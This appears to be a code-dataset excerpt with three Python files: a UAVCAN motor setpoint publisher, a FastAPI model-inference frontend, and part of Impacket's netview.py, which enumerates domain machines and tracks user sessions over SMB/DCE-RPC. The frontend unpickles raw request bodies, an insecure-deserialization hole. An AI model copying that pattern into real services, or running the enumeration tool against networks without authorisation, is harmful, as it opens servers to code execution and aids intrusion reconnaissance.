source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
SetpointPublisher.py
|
import enum
import logging
import time
import threading
import uavcan
class ControlTopic(enum.Enum):
voltage = 'voltage'
torque = 'torque'
velocity = 'velocity'
position = 'position'
def __str__(self):
return self.value
def __call__(self, node_id, value):
return {
'voltage': uavcan.thirdparty.cvra.motor.control.Voltage(node_id=node_id, voltage=value),
'torque': uavcan.thirdparty.cvra.motor.control.Torque(node_id=node_id, torque=value),
'velocity': uavcan.thirdparty.cvra.motor.control.Velocity(node_id=node_id, velocity=value),
'position': uavcan.thirdparty.cvra.motor.control.Position(node_id=node_id, position=value),
}[self.value]
class SetpointPublisher():
def __init__(self, node, topic, motor, value_min, value_max, period):
self.node = node
self.topic = topic
self.motor = motor
self.value_min = value_min
self.value_max = value_max
self.period = period
self.lock = threading.RLock()
self.handle = node.node.periodic(0.01, self._publish)
self.logger = logging.getLogger('SetpointPublisher')
threading.Thread(target=self._update).start()
def _publish(self):
with self.lock:
logging.info('Setpoint: {} {} to motor {} at period {}s'.format(self.topic, self.value, self.motor, self.period))
self.node.node.broadcast(self.topic(node_id=self.motor, value=self.value))
def _update(self):
while True:
with self.lock:
self.value = self.value_min
time.sleep(self.period)
with self.lock:
self.value = self.value_max
time.sleep(self.period)
def update(self):
self.handle.remove()
self.handle = self.node.node.periodic(0.01, self._publish)
|
root.py
|
import asyncio
import copy
import pickle
from re import T
from threading import Thread
from typing import Union
from fastapi import APIRouter, File, Request, Security, UploadFile
from fastapi import HTTPException, status
from fastapi import Depends
import fastapi
from fastapi.security import APIKeyHeader
import time
from datetime import datetime
from main_processes.frontend.utils import (
async_download_to_memory,
download_from_direct_link,
download_to_memory,
get_db,
get_storage,
)
from nxs_libs.interface.frontend.simple_interface import (
SimpleFrontendTaskSummaryProcessor,
)
from nxs_libs.object.pipeline_runtime import NxsPipelineRuntime
from nxs_libs.storage.nxs_blobstore import NxsAzureBlobStorage
from nxs_libs.storage.nxs_blobstore_async import NxsAsyncAzureBlobStorage
from nxs_types.backend import NxsBackendType
from nxs_types.frontend import (
BasicResponse,
FrontendModelPipelineWorkloadReport,
FrontendWorkloadReport,
TaskSummary,
)
from nxs_types.infer import (
NxsInferBatchImageInputFromAzureBlobstore,
NxsInferBatchImageInputFromUrl,
NxsInferExtraParams,
NxsInferImageInputFromAzureBlobstore,
NxsInferImageInputFromUrl,
NxsInferInput,
NxsInferInputType,
NxsInferRequest,
NxsInferStatus,
NxsInferTextInput,
NxsTensorsInferRequest,
)
from nxs_types.infer_result import (
NxsInferResult,
NxsInferResultType,
NxsInferResultWithMetadata,
)
from nxs_types.log import (
NxsBackendCmodelThroughputLog,
NxsBackendDeploymentsLog,
NxsBackendThroughputLog,
NxsSchedulerLog,
)
from nxs_types.message import (
NxsMsgPinWorkload,
NxsMsgReportInputWorkloads,
NxsMsgUnpinWorkload,
)
from nxs_utils.nxs_helper import *
from nxs_utils.common import *
from nxs_types.model import *
from configs import *
from main_processes.frontend.args import parse_args
# setup global variables
args = parse_args()
router = APIRouter(prefix="/tasks")
api_key_header = APIKeyHeader(name="X-API-Key", auto_error=True)
task_summary_processor = SimpleFrontendTaskSummaryProcessor()
pipeline_cache: Dict[str, NxsPipelineInfo] = {}
tasks_data = []
tasks_summary_data = []
session_params = {}
task_result_dict = {}
task_result_t0_dict = {}
shared_queue_pusher: NxsQueuePusher = None
redis_kv_server: NxsSimpleKeyValueDb = None
backend_infos: List[NxsBackendThroughputLog] = []
backend_infos_t0 = 0
scheduler_info: NxsSchedulerLog = None
scheduler_info_t0 = 0
# FIXME: find a better way to do x-api-key check
async def check_api_key(api_key_header: str = Security(api_key_header)):
if args.api_key == "":
return True
if api_key_header != args.api_key:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="wrong api key",
)
return True
def task_monitor_thread():
global tasks_data, tasks_summary_data, task_summary_processor
task_dict: Dict[str, FrontendModelPipelineWorkloadReport] = {}
task_ts_dict = {}
task_ts0_dict = {}
task_fps_dict = {}
queue_pusher = create_queue_pusher_from_args(args, NxsQueueType.REDIS)
t0 = time.time()
while True:
to_trigger_wl_manager = False
for _ in range(len(tasks_data)):
pipeline_uuid, session_uuid = tasks_data.pop(0)
key = f"{pipeline_uuid}_{session_uuid}"
if key not in task_dict:
task_dict[key] = FrontendModelPipelineWorkloadReport(
pipeline_uuid=pipeline_uuid,
session_uuid=session_uuid,
fps=0,
)
task_ts0_dict[key] = time.time()
task_fps_dict[key] = 0
to_trigger_wl_manager = True
task_fps_dict[key] += 1
task_ts_dict[key] = time.time()
if to_trigger_wl_manager or time.time() - t0 > args.workload_report_period_secs:
keys_to_clean = []
cur_ts = time.time()
for key in task_ts0_dict:
if cur_ts - task_ts0_dict[key] > args.model_caching_timeout_secs:
keys_to_clean.append(key)
for key in keys_to_clean:
task_dict.pop(key)
task_ts_dict.pop(key)
task_ts0_dict.pop(key)
task_fps_dict.pop(key)
workload_reports = []
for key in task_dict:
wl = task_dict[key]
if task_fps_dict[key] > 0:
# wl.fps = task_fps_dict[key] / max(1, (time.time() - task_ts0_dict[key]))
wl.fps = task_fps_dict[key]
workload_reports.append(task_dict[key])
if workload_reports:
metadata = task_summary_processor.process_summaries(tasks_summary_data)
tasks_summary_data.clear()
msg = NxsMsgReportInputWorkloads(
data=FrontendWorkloadReport(
frontend_name=args.frontend_name,
workload_reports=workload_reports,
metadata=json.dumps(metadata),
)
)
queue_pusher.push(GLOBAL_QUEUE_NAMES.WORKLOAD_MANAGER, msg)
# print("SENT", msg)
# reset all fps
for key in task_fps_dict:
task_fps_dict[key] = 0
t0 = time.time()
time.sleep(0.01)
def task_result_recv_thread():
global args, task_result_dict, task_result_t0_dict
queue_puller = create_queue_puller_from_args(
args, NxsQueueType.REDIS, args.frontend_name
)
cleanup_t0 = time.time()
expiration_secs = 60
while True:
msgs = queue_puller.pull()
for msg in msgs:
msg: NxsInferResult = msg
task_result_dict[msg.task_uuid] = msg
task_result_t0_dict[msg.task_uuid] = time.time()
# print("RECV", msg)
if time.time() - cleanup_t0 > 60:
# clean up some unused data
cur_ts = time.time()
to_remove_task_uuids = []
for task_uuid in task_result_t0_dict:
if cur_ts - task_result_t0_dict[task_uuid] > 3 * expiration_secs:
to_remove_task_uuids.append(task_uuid)
for task_uuid in to_remove_task_uuids:
task_result_t0_dict.pop(task_uuid, None)
task_result_dict.pop(task_uuid, None)
time.sleep(0.002)
def setup():
global shared_queue_pusher, redis_kv_server
task_monitor_thr = Thread(target=task_monitor_thread, args=())
task_monitor_thr.start()
task_recv_thr = Thread(target=task_result_recv_thread, args=())
task_recv_thr.start()
shared_queue_pusher = create_queue_pusher_from_args(args, NxsQueueType.REDIS)
redis_kv_server = create_simple_key_value_db_from_args(
args, NxsSimpleKeyValueDbType.REDIS
)
if shared_queue_pusher is None:
setup()
@router.post("/sessions/create")
async def create_session(
extra_params_json_str: str = "{}",
authenticated: bool = Depends(check_api_key),
):
global redis_kv_server
try:
extra_params = json.loads(extra_params_json_str)
except:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"extra_params_json_str has to be json string.",
)
session_uuid = generate_uuid()
key = f"{session_uuid}_params"
redis_kv_server.set_value(key, extra_params)
# store data into redis server
return {"session_uuid": session_uuid}
@router.post("/sessions/delete")
async def delete_session(
session_uuid: str, authenticated: bool = Depends(check_api_key)
):
key = f"{session_uuid}_params"
redis_kv_server.delete_key(key)
return {}
@router.post("/images/infer-from-file", response_model=NxsInferResult)
async def submit_image_task(
pipeline_uuid: str,
session_uuid: str = "global",
file: UploadFile = File(...),
extra_params_json_str: str = '{"preproc": {}, "postproc": {}, "transform": {}}',
infer_timeout: float = 10,
authenticated: bool = Depends(check_api_key),
):
image_bin = await file.read()
extra_params = {}
try:
extra_params = json.loads(extra_params_json_str)
except:
pass
extra_params = NxsInferExtraParams(**extra_params)
try:
res = await _infer_single(
image_bin, pipeline_uuid, session_uuid, extra_params, infer_timeout
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
return res
@router.post("/images/infer-from-url", response_model=NxsInferResult)
async def submit_image_task_from_url(
infer_info: NxsInferImageInputFromUrl,
authenticated: bool = Depends(check_api_key),
):
return await process_image_task_from_url(
infer_info.pipeline_uuid,
infer_info.session_uuid,
infer_info.url,
infer_info.extra_params,
infer_info.infer_timeout,
)
@router.post("/images/batch-infer-from-url", response_model=List[NxsInferResult])
async def submit_batch_image_task_from_url(
infer_info: NxsInferBatchImageInputFromUrl,
authenticated: bool = Depends(check_api_key),
):
tasks = []
for url in infer_info.urls:
tasks.append(
process_image_task_from_url(
infer_info.pipeline_uuid,
infer_info.session_uuid,
url,
infer_info.extra_params,
infer_info.infer_timeout,
)
)
return await asyncio.gather(*tasks)
async def process_image_task_from_url(
pipeline_uuid: str,
session_uuid: str,
url: str,
extra_params: NxsInferExtraParams = NxsInferExtraParams(),
infer_timeout: float = 10,
) -> NxsInferResult:
try:
image_bin = await async_download_to_memory(url)
return await _infer_single(
image_bin, pipeline_uuid, session_uuid, extra_params, infer_timeout
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
@router.post("/images/infer-from-blobstore", response_model=NxsInferResult)
async def submit_image_task_from_azure_blobstore(
infer_info: NxsInferImageInputFromAzureBlobstore,
authenticated: bool = Depends(check_api_key),
):
external_model_store = NxsAsyncAzureBlobStorage.from_sas_token(
account_name=infer_info.blobstore_account_name,
sas_token=infer_info.blobstore_sas_token,
container_name=infer_info.blobstore_container_name,
)
res = await process_image_task_from_azure_blobstore(
infer_info.pipeline_uuid,
infer_info.session_uuid,
infer_info.blobstore_path,
external_model_store,
infer_info.extra_params,
infer_info.infer_timeout,
)
await external_model_store.close()
return res
@router.post("/images/batch-infer-from-blobstore", response_model=List[NxsInferResult])
async def submit_batch_image_task_from_azure_blobstore(
infer_info: NxsInferBatchImageInputFromAzureBlobstore,
authenticated: bool = Depends(check_api_key),
):
external_model_store = NxsAsyncAzureBlobStorage.from_sas_token(
account_name=infer_info.blobstore_account_name,
sas_token=infer_info.blobstore_sas_token,
container_name=infer_info.blobstore_container_name,
)
tasks = []
for blobstore_path in infer_info.blobstore_paths:
tasks.append(
process_image_task_from_azure_blobstore(
infer_info.pipeline_uuid,
infer_info.session_uuid,
blobstore_path,
external_model_store,
infer_info.extra_params,
infer_info.infer_timeout,
)
)
results = await asyncio.gather(*tasks)
await external_model_store.close()
return results
async def process_image_task_from_azure_blobstore(
pipeline_uuid: str,
session_uuid: str,
blobstore_path: str,
external_model_store: NxsAsyncAzureBlobStorage,
extra_params: NxsInferExtraParams = NxsInferExtraParams(),
infer_timeout: float = 10,
) -> NxsInferResult:
try:
image_bin = await external_model_store.download(blobstore_path)
return await _infer_single(
image_bin, pipeline_uuid, session_uuid, extra_params, infer_timeout
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
@router.post("/texts/infer", response_model=NxsInferResult)
async def submit_text_task(
infer_info: NxsInferTextInput,
authenticated: bool = Depends(check_api_key),
):
session_uuid: str = "global"
if infer_info.session_uuid is not None:
session_uuid = infer_info.session_uuid
try:
res = await _infer_single(
infer_info.text,
infer_info.pipeline_uuid,
session_uuid,
infer_info.extra_params,
infer_info.infer_timeout,
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
return res
@router.post("/tensors/infer", response_model=NxsInferResult)
async def submit_task_tensors(
request: Request,
authenticated: bool = Depends(check_api_key),
):
data: bytes = await request.body()
infer_request = pickle.loads(data)
if isinstance(infer_request, Dict):
try:
infer_request = NxsTensorsInferRequest(**infer_request)
except:
# raise HTTPException(
# status.HTTP_400_BAD_REQUEST,
# "request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict.",
# )
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[
"request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict."
],
)
if not isinstance(infer_request, NxsTensorsInferRequest):
# raise HTTPException(
# status.HTTP_400_BAD_REQUEST,
# "request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict.",
# )
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[
"request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict."
],
)
else:
infer_request: NxsTensorsInferRequest = infer_request
try:
res = await _infer_tensors(infer_request)
except Exception as e:
# raise HTTPException(status.HTTP_400_BAD_REQUEST, str(e))
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
return res
if args.enable_benchmark_api:
@router.post("/benchmarks/redis")
async def submit_benchmark_redis_task(
file: UploadFile = File(...),
authenticated: bool = Depends(check_api_key),
):
global shared_queue_pusher
image_bin = await file.read()
# send this to redis
task_uuid = generate_uuid()
infer_result = NxsInferResultWithMetadata(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.COMPLETED,
task_uuid=task_uuid,
metadata=image_bin,
)
shared_queue_pusher.push(args.frontend_name, infer_result)
# wait for result
result = {}
while True:
if task_uuid not in task_result_dict:
# time.sleep(0.01)
await asyncio.sleep(0.0025)
continue
result = task_result_dict.pop(task_uuid)
break
return {"status": "COMPLETED"}
if args.enable_scaling:
@router.post("/backends/scale/gpu", response_model=BasicResponse)
async def scale_backends(
num_backends: int,
authenticated: bool = Depends(check_api_key),
):
if num_backends < 0:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"num_backends must be at least 0",
)
deployment_items = []
try:
from kubernetes import client, config
config.load_kube_config()
api_instance = client.AppsV1Api()
deployment = api_instance.list_namespaced_deployment(namespace="nxs")
deployment_items = deployment.items
except Exception as e:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Internal error. Please try again later.",
)
found_gpu_backend_deployment = False
for item in deployment_items:
if "name" not in item.metadata.labels:
continue
if item.metadata.labels["name"] == "nxs-backend-gpu":
item.spec.replicas = num_backends
try:
api_response = api_instance.patch_namespaced_deployment(
"nxs-backend-gpu", "nxs", item
)
found_gpu_backend_deployment = True
except Exception as e:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Internal error. Please try again later.",
)
if not found_gpu_backend_deployment:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Could not find nxs-backend-gpu deployment.",
)
return BasicResponse(is_successful=True)
def get_backend_logs() -> List[NxsBackendThroughputLog]:
global redis_kv_server
logs = redis_kv_server.get_value(GLOBAL_QUEUE_NAMES.BACKEND_MONITOR_LOGS)
if logs is None:
logs = []
return logs
@router.get("/monitoring/backends", response_model=List[NxsBackendThroughputLog])
async def get_monitoring_backend_reports(
authenticated: bool = Depends(check_api_key),
):
global redis_kv_server, backend_infos, backend_infos_t0
logs = get_backend_logs()
backend_infos_t0 = time.time()
backend_infos = logs
return logs
if args.enable_scaling:
def get_num_deployment_replicas(deployment_name: str) -> int:
num_replicas = 0
deployment_items = []
try:
from kubernetes import client, config
config.load_kube_config()
api_instance = client.AppsV1Api()
deployment = api_instance.list_namespaced_deployment(namespace="nxs")
deployment_items = deployment.items
except Exception as e:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Internal error. Please try again later.",
)
for item in deployment_items:
if "name" not in item.metadata.labels:
continue
if item.metadata.labels["name"] == deployment_name:
num_replicas = item.spec.replicas
return num_replicas
@router.get(
"/monitoring/backend_deployments", response_model=NxsBackendDeploymentsLog
)
async def get_backend_deployments(
authenticated: bool = Depends(check_api_key),
):
num_requested_cpu_backends = 0
num_requested_gpu_backends = 0
num_available_cpu_backends = 0
num_available_gpu_backends = 0
backend_infos = get_backend_logs()
for backend_info in backend_infos:
if backend_info.backend_type == NxsBackendType.CPU:
num_available_cpu_backends += 1
elif backend_info.backend_type == NxsBackendType.GPU:
num_available_gpu_backends += 1
num_requested_cpu_backends = get_num_deployment_replicas("nxs-backend-cpu")
num_requested_gpu_backends = get_num_deployment_replicas("nxs-backend-gpu")
return NxsBackendDeploymentsLog(
num_requested_cpu_backends=num_requested_cpu_backends,
num_available_cpu_backends=num_available_cpu_backends,
num_requested_gpu_backends=num_requested_gpu_backends,
num_available_gpu_backends=num_available_gpu_backends,
)
def get_scheduler_log() -> NxsSchedulerLog:
global redis_kv_server
scheduler_log: NxsSchedulerLog = redis_kv_server.get_value(
GLOBAL_QUEUE_NAMES.SCHEDULER_LOGS
)
if scheduler_log is None:
scheduler_log = NxsSchedulerLog()
return scheduler_log
@router.get("/monitoring/scheduler", response_model=NxsSchedulerLog)
async def get_monitoring_scheduler_report(
authenticated: bool = Depends(check_api_key),
):
global scheduler_info, scheduler_info_t0
scheduler_info = get_scheduler_log()
scheduler_info_t0 = time.time()
return scheduler_info
async def _infer_single(
data: Union[bytes, str],
pipeline_uuid: str,
session_uuid: str,
users_extra_params: NxsInferExtraParams = NxsInferExtraParams(),
infer_timeout: float = 10,
) -> NxsInferResult:
global tasks_data, shared_queue_pusher, task_result_dict, tasks_summary_data
global task_summary_processor, session_params, redis_kv_server
global backend_infos_t0, backend_infos
global scheduler_info, scheduler_info_t0
entry_t0 = time.time()
if entry_t0 - backend_infos_t0 > 15:
backend_infos = get_backend_logs()
backend_infos_t0 = time.time()
if not backend_infos:
raise Exception("No backend is available.")
to_wait = True
if not args.wait_for_models:
if entry_t0 - scheduler_info_t0 > 15:
scheduler_info = get_scheduler_log()
scheduler_info_t0 = time.time()
cmodel_uuids: List[str] = []
for request in scheduler_info.scheduling_requests:
if request.pipeline_uuid == pipeline_uuid:
cmodel_uuids.extend(request.cmodel_uuid_list)
if not cmodel_uuids:
# models are not scheduled yet
to_wait = False
for cmodel_uuid in cmodel_uuids:
found_cmodel = False
for plan in scheduler_info.scheduling_plans:
for cmodel_uuid_on_backend in plan.cmodel_uuid_list:
if cmodel_uuid_on_backend == cmodel_uuid:
found_cmodel = True
break
if found_cmodel:
break
if not found_cmodel:
to_wait = False
break
task_uuid = generate_uuid()
task_summary = TaskSummary(
pipeline_uuid=pipeline_uuid,
session_uuid=session_uuid,
task_uuid=task_uuid,
start_ts=entry_t0,
)
task_summary_processor.pre_task_processing(task_summary)
pipeline = _get_pipeline_info(pipeline_uuid)
if pipeline is None:
raise Exception("invalid pipeline uuid")
# num_inputs = len(pipeline.models[0].component_models[0].model_desc.inputs)
# if num_inputs > 1:
# raise Exception("This api only works with single input models.")
# num_shape_dims = len(
# pipeline.models[0].component_models[0].model_desc.inputs[0].shape
# )
# if num_shape_dims != 4:
# raise HTTPException(
# status.HTTP_400_BAD_REQUEST,
# "This api only works on input with 4 dims.",
# )
tasks_data.append((pipeline_uuid, session_uuid))
if not to_wait:
raise Exception("Model is not ready to serve. Please try again later.")
pipeline_uuids = copy.deepcopy(pipeline.pipeline)
pipeline_uuids.append(args.frontend_name)
model_input = pipeline.models[0].component_models[0].model_desc.inputs[0]
model_input_type = NxsInferInputType.ENCODED_IMAGE
if isinstance(data, str):
model_input_type = NxsInferInputType.PICKLED_DATA
data = pickle.dumps(data)
next_topic = pipeline_uuids.pop(0)
_extra_params = _get_session_params(session_uuid)
infer_task = NxsInferRequest(
task_uuid=task_uuid,
session_uuid=session_uuid,
exec_pipelines=pipeline_uuids,
inputs=[
NxsInferInput(
name=model_input.name,
type=model_input_type,
data=data,
)
],
extra_preproc_params=json.dumps(users_extra_params.preproc),
extra_transform_params=json.dumps(users_extra_params.transform),
extra_postproc_params=json.dumps(users_extra_params.postproc),
extra_params=json.dumps(_extra_params),
)
# shared_queue_pusher.push(next_topic, infer_task)
shared_queue_pusher.push_to_session(next_topic, session_uuid, infer_task)
# wait for result
result = {}
while True:
if time.time() - entry_t0 > infer_timeout:
raise Exception("Request timeout")
if task_uuid not in task_result_dict:
# time.sleep(0.01)
await asyncio.sleep(0.0025)
continue
result = task_result_dict.pop(task_uuid)
break
task_summary.end_ts = time.time()
task_summary.e2e_latency = task_summary.end_ts - entry_t0
if isinstance(result, NxsInferResult):
result.e2e_latency = task_summary.e2e_latency
task_summary_processor.post_task_processing(task_summary)
tasks_summary_data.append(task_summary)
return NxsInferResult(**(result.dict()))
async def _infer_tensors(infer_request: NxsTensorsInferRequest):
global tasks_data, shared_queue_pusher, task_result_dict
global tasks_summary_data, task_summary_processor, session_params, redis_kv_server
global backend_infos_t0, backend_infos
entry_t0 = time.time()
if entry_t0 - backend_infos_t0 > 15:
backend_infos = get_backend_logs()
backend_infos_t0 = time.time()
if not backend_infos:
raise Exception("No backend is available. Please bring up some backends.")
task_uuid = generate_uuid()
task_summary = TaskSummary(
pipeline_uuid=infer_request.pipeline_uuid,
session_uuid=infer_request.session_uuid,
task_uuid=task_uuid,
start_ts=entry_t0,
)
task_summary_processor.pre_task_processing(task_summary)
pipeline = _get_pipeline_info(infer_request.pipeline_uuid)
if pipeline is None:
raise Exception("invalid pipeline uuid")
tasks_data.append((infer_request.pipeline_uuid, infer_request.session_uuid))
pipeline_uuids = copy.deepcopy(pipeline.pipeline)
pipeline_uuids.append(args.frontend_name)
next_topic = pipeline_uuids.pop(0)
extra_params = _get_session_params(infer_request.session_uuid)
infer_task = NxsInferRequest(
task_uuid=task_uuid,
session_uuid=infer_request.session_uuid,
exec_pipelines=pipeline_uuids,
inputs=infer_request.inputs,
extra_preproc_params=infer_request.extra_preproc_params,
extra_transform_params=infer_request.extra_transform_params,
extra_postproc_params=infer_request.extra_postproc_params,
extra_params=json.dumps(extra_params),
)
# shared_queue_pusher.push(next_topic, infer_task)
shared_queue_pusher.push_to_session(
next_topic, infer_request.session_uuid, infer_task
)
# wait for result
result = {}
while True:
if time.time() - entry_t0 > infer_request.infer_timeout:
raise Exception("Request timeout")
if task_uuid not in task_result_dict:
# time.sleep(0.01)
await asyncio.sleep(0.0025)
continue
result = task_result_dict.pop(task_uuid)
break
task_summary.end_ts = time.time()
task_summary.e2e_latency = task_summary.end_ts - entry_t0
if isinstance(result, NxsInferResult):
result.e2e_latency = task_summary.e2e_latency
task_summary_processor.post_task_processing(task_summary)
tasks_summary_data.append(task_summary)
return NxsInferResult(**(result.dict()))
def _get_pipeline_info(pipeline_uuid) -> Union[NxsPipelineInfo, None]:
global pipeline_cache
if pipeline_uuid in pipeline_cache:
return pipeline_cache[pipeline_uuid]
db = get_db(args)
pipeline = NxsPipelineRuntime.get_from_db(pipeline_uuid, db)
db.close()
if pipeline is not None:
pipeline_cache[pipeline_uuid] = pipeline.get_pipeline_info()
return pipeline_cache[pipeline_uuid]
return None
def _get_session_params(session_uuid) -> Dict:
global session_params, redis_kv_server
extra_params = {}
if session_uuid not in session_params:
extra_params = redis_kv_server.get_value(session_uuid)
if extra_params is None:
extra_params = {}
else:
session_params[session_uuid] = extra_params
return extra_params
|
netview.py
|
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
# YOU HAVE TO BE ABLE TO RESOLV THE DOMAIN MACHINES NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
# Author:
# beto (@agsolino)
#
from __future__ import division
from __future__ import print_function
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from queue import Queue
from time import sleep
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception as e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
elif self.__domain != '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's gonna be a one shoot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in list(self.__targets.keys()):
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException) as e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
